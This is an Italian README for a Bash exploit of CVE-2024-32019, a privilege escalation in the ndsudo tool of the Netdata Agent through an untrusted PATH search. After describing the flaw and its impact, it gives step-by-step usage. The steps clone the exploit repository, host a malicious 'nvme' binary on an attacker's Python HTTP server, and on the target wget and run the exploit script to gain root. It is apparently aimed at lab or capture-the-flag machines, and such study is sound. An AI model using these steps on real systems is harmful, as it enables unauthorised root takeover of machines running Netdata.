
Exploit di escalation dei privilegi basato su Bash per CVE-2024-32019 nello strumento ndsudo dell'agente Netdata, che sfrutta la ricerca PATH non attendibile per eseguire binari arbitrari con privilegi di root.
La vulnerabilità ndsudo consente a un attaccante di ottenere permessi di root sfruttando un percorso di ricerca non attendibile nello strumento ndsudo, che fa parte dell'Agente Netdata. Ciò può consentire l'esecuzione di programmi arbitrari con privilegi elevati se l'attaccante posiziona un binario malevolo in una directory scrivibile e modifica di conseguenza la variabile d'ambiente PATH.
La vulnerabilità ndsudo, identificata come CVE-2024-32019, colpisce le versioni dello strumento ndsudo incluse nell'Agente Netdata, in particolare le versioni v1.45.0 e precedenti. Questa vulnerabilità consente agli attaccanti di escalare i privilegi sui sistemi in cui lo strumento è installato.
Come funziona la vulnerabilità:
Meccanismo di sfruttamento:-
Percorso di ricerca non attendibile: Lo strumento ndsudo utilizza la variabile d'ambiente PATH per localizzare i comandi esterni. Un attaccante può manipolare questa variabile per puntare a una directory che controlla.
Esecuzione di binari malevoli: Posizionando un eseguibile malevolo con lo stesso nome di un comando che ndsudo è autorizzato a eseguire (ad esempio, nvme) in una directory scrivibile, l'attaccante può eseguire codice arbitrario con permessi di root.
Complessità dell'attacco:-
Bassa complessità: L'attacco non richiede competenze avanzate; uno script bash facilmente realizzabile può essere utilizzato per l'escalation, rendendolo accessibile a molti potenziali attaccanti.
Impatto della vulnerabilità:-
Escalation dei privilegi: Lo sfruttamento riuscito consente a un attaccante di ottenere accesso root, che può portare al pieno controllo del sistema interessato.
Rischi potenziali: Ciò può comportare accesso non autorizzato ai dati, manipolazione del sistema e ulteriore sfruttamento delle risorse di rete.
ESCALATION DEI PRIVILEGI Ho creato due script bash per ottenere facilmente accesso da utente a root. Segui i passaggi come indicato di seguito:-
git clone https://github.com/justjoeyking/CVE-2024-32019-ndsudo.git
cd CVE-2024-32019-ndsudo
chmod +x ndsudo_exp.sh
Ora crea un server python:
python3 -m http.server 8080
Apri il file ndsudo_exploit.sh usando gedit o pluma, a seconda di quale sia disponibile. Potrai vedere il comando wget in questo modo:
wget http://10.10.14.70:8080/nvme -o /tmp/nvme
Cambia l'indirizzo IP con l'IP della tua macchina
Ora vai sulla macchina target, apri il terminale e fai quanto segue:
wget http://<your-ip-addr>:8080/ndsudo_exploit.sh
chmod +x ndsudo_exploit.sh
./ndsudo_exploit.sh